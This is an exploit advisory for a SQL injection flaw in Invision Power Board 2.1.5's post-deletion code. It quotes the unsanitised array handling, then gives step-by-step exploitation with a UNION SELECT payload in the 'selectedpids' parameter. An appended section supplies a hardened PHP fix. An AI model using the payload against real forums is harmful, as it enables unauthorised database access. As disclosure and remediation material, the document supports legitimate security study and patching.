Invision Power Board v2.1.5 Remote SQL Injection

Filename      :- func_mod.php
Function name :- post_delete()
Lines         :- 89 To 209

Bug Found By :- Devil-00

        Greetz :-
                Rock Master ^ Hackers Pal ^ n0m4rcy ^
                        www.securtygurus.net

[CODE]

    if ( is_array( $id ) )
    {
        if ( count($id) > 0 )
        {
            // array branch: the elements are joined as-is, with no intval() check
            $pid = " IN(".implode(",",$id).")";
        }
        else
        {
            return FALSE;
        }
    }
    else
    {
        // scalar branch: the value is only accepted if intval() is non-zero
        if ( intval($id) )
        {
            $pid   = "=$id";
        }
        else
        {
            return FALSE;
        }
    }

[/CODE]

When $id is an array, the code never runs its elements through intval(); it only checks that the array is non-empty:

[CODE]
    if ( count($id) > 0 )
    {
        $pid = " IN(".implode(",",$id).")";
    }
[/CODE]

$pid is then concatenated straight into the WHERE clause, so we can do SQL injection here:

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 
'from' => 'posts', 'where' => 'pid'.$pid ) );
[/CODE]

And here:

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 
'attachments', 'where' => "attach_pid".$pid ) );
[/CODE]

Because the two queries select a different number of columns, we can't use a single UNION to exploit both of them :( Bad :(

Example of exploitation:

        1- First, add 2 posts.
        2- Check them for deletion.
        3- Edit the query string with HTTPLiveHeader:

[CODE]
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION 
SELECT 1,3/*&tact=delete
[/CODE]
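The fix is to validate every element of the array the same way the scalar branch is meant to. The following is an added example, not IPB's own code: a hardened version of the $pid construction in which array elements are coerced with intval() and non-positive values are dropped, and in which the intval() result (not the raw input) is used in both branches. The function name build_pid_clause and the constructed sample inputs are mine.

```php
<?php
// Added example (not from func_mod.php): hardened replacement for the $pid
// construction in post_delete(). Only positive integers can reach the SQL.
function build_pid_clause($id)
{
    if (is_array($id)) {
        // Coerce each element to an integer, then discard anything that was
        // not a positive post id (intval("-1) UNION ...") yields -1, dropped).
        $ids = array_filter(array_map('intval', $id), function ($v) {
            return $v > 0;
        });
        if (count($ids) === 0) {
            return FALSE;
        }
        return ' IN(' . implode(',', array_values($ids)) . ')';
    }

    // Scalar branch: use the coerced value, never the raw string
    $id = intval($id);
    if ($id <= 0) {
        return FALSE;
    }
    return '=' . $id;
}

// Constructed inputs: a legitimate selection of two posts, a scalar id, and an
// array element shaped like the value the advisory shows being injected.
$legit   = array('12', '15');
$scalar  = '7';
$tainted = array('-1) UNION SELECT 1,3/*');

var_dump(build_pid_clause($legit));    // a plain IN(...) list of integers
var_dump(build_pid_clause($scalar));   // "=7"
var_dump(build_pid_clause($tainted));  // FALSE: nothing survives the filter
```

A prepared statement with one placeholder per id is the stronger option where the DB layer supports it; the coercion above is the minimal change that fits the existing simple_construct() string interface.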